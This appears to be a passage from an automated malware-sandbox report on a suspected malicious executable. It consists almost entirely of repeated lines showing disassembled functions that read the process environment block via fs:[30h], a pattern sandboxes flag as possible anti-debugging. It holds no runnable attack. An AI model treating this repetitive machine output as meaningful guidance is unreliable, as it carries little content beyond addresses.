        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7E3EFC mov eax, dword ptr fs:[00000030h]7_2_1D7E3EFC
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D743EE2 mov eax, dword ptr fs:[00000030h]7_2_1D743EE2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D771EED mov eax, dword ptr fs:[00000030h]7_2_1D771EED
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D771EED mov eax, dword ptr fs:[00000030h]7_2_1D771EED
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D771EED mov eax, dword ptr fs:[00000030h]7_2_1D771EED
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D781ED8 mov eax, dword ptr fs:[00000030h]7_2_1D781ED8
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77BED0 mov eax, dword ptr fs:[00000030h]7_2_1D77BED0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C7EC3 mov eax, dword ptr fs:[00000030h]7_2_1D7C7EC3
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C7EC3 mov ecx, dword ptr fs:[00000030h]7_2_1D7C7EC3
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D751EB2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D751EB2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751EB2 mov eax, dword ptr fs:[00000030h]7_2_1D751EB2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D751EB2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D751EB2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751EB2 mov eax, dword ptr fs:[00000030h]7_2_1D751EB2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D751EB2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D751EB2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751EB2 mov eax, dword ptr fs:[00000030h]7_2_1D751EB2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D751EB2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D751EB2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751EB2 mov eax, dword ptr fs:[00000030h]7_2_1D751EB2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76BE80 mov eax, dword ptr fs:[00000030h]7_2_1D76BE80
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74B950 mov eax, dword ptr fs:[00000030h]7_2_1D74B950
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74B950 mov ecx, dword ptr fs:[00000030h]7_2_1D74B950
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74B950 mov eax, dword ptr fs:[00000030h]7_2_1D74B950
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74B950 mov eax, dword ptr fs:[00000030h]7_2_1D74B950
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74B950 mov eax, dword ptr fs:[00000030h]7_2_1D74B950
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74B950 mov eax, dword ptr fs:[00000030h]7_2_1D74B950
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C395B mov eax, dword ptr fs:[00000030h]7_2_1D7C395B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C395B mov eax, dword ptr fs:[00000030h]7_2_1D7C395B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C395B mov eax, dword ptr fs:[00000030h]7_2_1D7C395B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76D940 mov eax, dword ptr fs:[00000030h]7_2_1D76D940
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76D940 mov eax, dword ptr fs:[00000030h]7_2_1D76D940
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FD947 mov eax, dword ptr fs:[00000030h]7_2_1D7FD947
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73B931 mov eax, dword ptr fs:[00000030h]7_2_1D73B931
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73B931 mov eax, dword ptr fs:[00000030h]7_2_1D73B931
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D5930 mov eax, dword ptr fs:[00000030h]7_2_1D7D5930
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D5930 mov eax, dword ptr fs:[00000030h]7_2_1D7D5930
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D5930 mov eax, dword ptr fs:[00000030h]7_2_1D7D5930
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D5930 mov ecx, dword ptr fs:[00000030h]7_2_1D7D5930
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D769938 mov ecx, dword ptr fs:[00000030h]7_2_1D769938
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D775921 mov eax, dword ptr fs:[00000030h]7_2_1D775921
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D775921 mov ecx, dword ptr fs:[00000030h]7_2_1D775921
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D775921 mov eax, dword ptr fs:[00000030h]7_2_1D775921
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D775921 mov eax, dword ptr fs:[00000030h]7_2_1D775921
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737917 mov eax, dword ptr fs:[00000030h]7_2_1D737917
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7399F0 mov ecx, dword ptr fs:[00000030h]7_2_1D7399F0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76B9FA mov eax, dword ptr fs:[00000030h]7_2_1D76B9FA
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7E99D6 mov ecx, dword ptr fs:[00000030h]7_2_1D7E99D6
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74B9C0 mov eax, dword ptr fs:[00000030h]7_2_1D74B9C0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74B9C0 mov eax, dword ptr fs:[00000030h]7_2_1D74B9C0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76D9CE mov eax, dword ptr fs:[00000030h]7_2_1D76D9CE
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FD9C6 mov eax, dword ptr fs:[00000030h]7_2_1D7FD9C6
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CD9C7 mov eax, dword ptr fs:[00000030h]7_2_1D7CD9C7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73B9B0 mov eax, dword ptr fs:[00000030h]7_2_1D73B9B0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D80D946 mov eax, dword ptr fs:[00000030h]7_2_1D80D946
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CF9AA mov eax, dword ptr fs:[00000030h]7_2_1D7CF9AA
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CF9AA mov eax, dword ptr fs:[00000030h]7_2_1D7CF9AA
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74F870 mov eax, dword ptr fs:[00000030h]7_2_1D74F870
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D74F870 mov eax, dword ptr fs:[00000030h]7_2_1D74F870
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D759870 mov eax, dword ptr fs:[00000030h]7_2_1D759870
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D759870 mov eax, dword ptr fs:[00000030h]7_2_1D759870
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CF85C mov eax, dword ptr fs:[00000030h]7_2_1D7CF85C
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CF85C mov eax, dword ptr fs:[00000030h]7_2_1D7CF85C
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CF85C mov eax, dword ptr fs:[00000030h]7_2_1D7CF85C
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF85F mov eax, dword ptr fs:[00000030h]7_2_1D7EF85F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF85F mov eax, dword ptr fs:[00000030h]7_2_1D7EF85F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF85F mov eax, dword ptr fs:[00000030h]7_2_1D7EF85F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76B839 mov eax, dword ptr fs:[00000030h]7_2_1D76B839
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h]7_2_1D7FF82B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h]7_2_1D7FF82B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h]7_2_1D7FF82B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h]7_2_1D7FF82B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h]7_2_1D7FF82B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h]7_2_1D7FF82B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h]7_2_1D7FF82B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h]7_2_1D7FF82B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h]7_2_1D7FF82B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h]7_2_1D7FF82B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h]7_2_1D7FF82B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h]7_2_1D7FF82B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h]7_2_1D7FF82B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FF82B mov eax, dword ptr fs:[00000030h]7_2_1D7FF82B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D8018DA mov eax, dword ptr fs:[00000030h]7_2_1D8018DA
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D8018DA mov eax, dword ptr fs:[00000030h]7_2_1D8018DA
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D8018DA mov eax, dword ptr fs:[00000030h]7_2_1D8018DA
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D8018DA mov eax, dword ptr fs:[00000030h]7_2_1D8018DA
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73D818 mov eax, dword ptr fs:[00000030h]7_2_1D73D818
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73D800 mov eax, dword ptr fs:[00000030h]7_2_1D73D800
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753800 mov eax, dword ptr fs:[00000030h]7_2_1D753800
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753800 mov eax, dword ptr fs:[00000030h]7_2_1D753800
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753800 mov eax, dword ptr fs:[00000030h]7_2_1D753800
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF8F8 mov eax, dword ptr fs:[00000030h]7_2_1D7EF8F8
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF8F8 mov eax, dword ptr fs:[00000030h]7_2_1D7EF8F8
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF8F8 mov eax, dword ptr fs:[00000030h]7_2_1D7EF8F8
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF8F8 mov eax, dword ptr fs:[00000030h]7_2_1D7EF8F8
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7EF8F8 mov eax, dword ptr fs:[00000030h]7_2_1D7EF8F8
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76D8F0 mov eax, dword ptr fs:[00000030h]7_2_1D76D8F0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76D8F0 mov eax, dword ptr fs:[00000030h]7_2_1D76D8F0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76D8F0 mov esi, dword ptr fs:[00000030h]7_2_1D76D8F0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76D8F0 mov eax, dword ptr fs:[00000030h]7_2_1D76D8F0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76D8F0 mov eax, dword ptr fs:[00000030h]7_2_1D76D8F0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76D8F0 mov eax, dword ptr fs:[00000030h]7_2_1D76D8F0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76D8F0 mov eax, dword ptr fs:[00000030h]7_2_1D76D8F0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76D8F0 mov eax, dword ptr fs:[00000030h]7_2_1D76D8F0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7378E1 mov eax, dword ptr fs:[00000030h]7_2_1D7378E1
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7458E0 mov eax, dword ptr fs:[00000030h]7_2_1D7458E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7458E0 mov eax, dword ptr fs:[00000030h]7_2_1D7458E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7458E0 mov eax, dword ptr fs:[00000030h]7_2_1D7458E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7458E0 mov eax, dword ptr fs:[00000030h]7_2_1D7458E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7498DE mov eax, dword ptr fs:[00000030h]7_2_1D7498DE
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h]7_2_1D73F8B0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h]7_2_1D73F8B0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h]7_2_1D73F8B0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h]7_2_1D73F8B0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h]7_2_1D73F8B0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h]7_2_1D73F8B0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h]7_2_1D73F8B0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h]7_2_1D73F8B0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h]7_2_1D73F8B0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h]7_2_1D73F8B0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73F8B0 mov eax, dword ptr fs:[00000030h]7_2_1D73F8B0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C98B2 mov eax, dword ptr fs:[00000030h]7_2_1D7C98B2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77B890 mov eax, dword ptr fs:[00000030h]7_2_1D77B890
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77B890 mov eax, dword ptr fs:[00000030h]7_2_1D77B890
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77B890 mov eax, dword ptr fs:[00000030h]7_2_1D77B890
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76D898 mov eax, dword ptr fs:[00000030h]7_2_1D76D898
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D767882 mov eax, dword ptr fs:[00000030h]7_2_1D767882
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7E1889 mov eax, dword ptr fs:[00000030h]7_2_1D7E1889
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7E1889 mov eax, dword ptr fs:[00000030h]7_2_1D7E1889
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7E1889 mov eax, dword ptr fs:[00000030h]7_2_1D7E1889
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77188E mov eax, dword ptr fs:[00000030h]7_2_1D77188E
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77188E mov eax, dword ptr fs:[00000030h]7_2_1D77188E
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737B7D mov eax, dword ptr fs:[00000030h]7_2_1D737B7D
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737B7D mov ecx, dword ptr fs:[00000030h]7_2_1D737B7D
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77BB5B mov esi, dword ptr fs:[00000030h]7_2_1D77BB5B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CFB45 mov eax, dword ptr fs:[00000030h]7_2_1D7CFB45
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FBB40 mov ecx, dword ptr fs:[00000030h]7_2_1D7FBB40
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FBB40 mov eax, dword ptr fs:[00000030h]7_2_1D7FBB40
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CDB2A mov eax, dword ptr fs:[00000030h]7_2_1D7CDB2A
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CDB1B mov eax, dword ptr fs:[00000030h]7_2_1D7CDB1B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D781B0F mov eax, dword ptr fs:[00000030h]7_2_1D781B0F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D781B0F mov eax, dword ptr fs:[00000030h]7_2_1D781B0F
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737BF0 mov eax, dword ptr fs:[00000030h]7_2_1D737BF0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737BF0 mov ecx, dword ptr fs:[00000030h]7_2_1D737BF0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737BF0 mov eax, dword ptr fs:[00000030h]7_2_1D737BF0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737BF0 mov eax, dword ptr fs:[00000030h]7_2_1D737BF0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751BE7 mov eax, dword ptr fs:[00000030h]7_2_1D751BE7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751BE7 mov eax, dword ptr fs:[00000030h]7_2_1D751BE7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D775BE0 mov eax, dword ptr fs:[00000030h]7_2_1D775BE0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D775BE0 mov eax, dword ptr fs:[00000030h]7_2_1D775BE0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76FBC0 mov ecx, dword ptr fs:[00000030h]7_2_1D76FBC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76FBC0 mov eax, dword ptr fs:[00000030h]7_2_1D76FBC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76FBC0 mov eax, dword ptr fs:[00000030h]7_2_1D76FBC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76FBC0 mov eax, dword ptr fs:[00000030h]7_2_1D76FBC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76FBC0 mov eax, dword ptr fs:[00000030h]7_2_1D76FBC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77BBC0 mov eax, dword ptr fs:[00000030h]7_2_1D77BBC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77BBC0 mov eax, dword ptr fs:[00000030h]7_2_1D77BBC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77BBC0 mov ecx, dword ptr fs:[00000030h]7_2_1D77BBC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77BBC0 mov eax, dword ptr fs:[00000030h]7_2_1D77BBC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7BFBC2 mov eax, dword ptr fs:[00000030h]7_2_1D7BFBC2
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7D5BC0 mov eax, dword ptr fs:[00000030h]7_2_1D7D5BC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D743BA4 mov eax, dword ptr fs:[00000030h]7_2_1D743BA4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D743BA4 mov eax, dword ptr fs:[00000030h]7_2_1D743BA4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D743BA4 mov eax, dword ptr fs:[00000030h]7_2_1D743BA4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D743BA4 mov eax, dword ptr fs:[00000030h]7_2_1D743BA4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D771B9C mov eax, dword ptr fs:[00000030h]7_2_1D771B9C
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CDB90 mov eax, dword ptr fs:[00000030h]7_2_1D7CDB90
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7C1B93 mov eax, dword ptr fs:[00000030h]7_2_1D7C1B93
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D751B80 mov eax, dword ptr fs:[00000030h]7_2_1D751B80
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73FA44 mov ecx, dword ptr fs:[00000030h]7_2_1D73FA44
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CDA40 mov eax, dword ptr fs:[00000030h]7_2_1D7CDA40
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D779A48 mov eax, dword ptr fs:[00000030h]7_2_1D779A48
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D779A48 mov eax, dword ptr fs:[00000030h]7_2_1D779A48
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737A30 mov eax, dword ptr fs:[00000030h]7_2_1D737A30
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737A30 mov eax, dword ptr fs:[00000030h]7_2_1D737A30
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D737A30 mov eax, dword ptr fs:[00000030h]7_2_1D737A30
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7CDA31 mov eax, dword ptr fs:[00000030h]7_2_1D7CDA31
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7FDA30 mov eax, dword ptr fs:[00000030h]7_2_1D7FDA30
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D741A24 mov eax, dword ptr fs:[00000030h]7_2_1D741A24
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D741A24 mov eax, dword ptr fs:[00000030h]7_2_1D741A24
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76DA20 mov eax, dword ptr fs:[00000030h]7_2_1D76DA20
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76DA20 mov eax, dword ptr fs:[00000030h]7_2_1D76DA20
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76DA20 mov eax, dword ptr fs:[00000030h]7_2_1D76DA20
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76DA20 mov eax, dword ptr fs:[00000030h]7_2_1D76DA20
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76DA20 mov eax, dword ptr fs:[00000030h]7_2_1D76DA20
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76DA20 mov edx, dword ptr fs:[00000030h]7_2_1D76DA20
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753AF6 mov eax, dword ptr fs:[00000030h]7_2_1D753AF6
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753AF6 mov eax, dword ptr fs:[00000030h]7_2_1D753AF6
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753AF6 mov eax, dword ptr fs:[00000030h]7_2_1D753AF6
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753AF6 mov eax, dword ptr fs:[00000030h]7_2_1D753AF6
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D753AF6 mov eax, dword ptr fs:[00000030h]7_2_1D753AF6
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D749AE4 mov eax, dword ptr fs:[00000030h]7_2_1D749AE4
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D73FAEC mov edi, dword ptr fs:[00000030h]7_2_1D73FAEC
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76DAC0 mov eax, dword ptr fs:[00000030h]7_2_1D76DAC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D76DAC0 mov eax, dword ptr fs:[00000030h]7_2_1D76DAC0
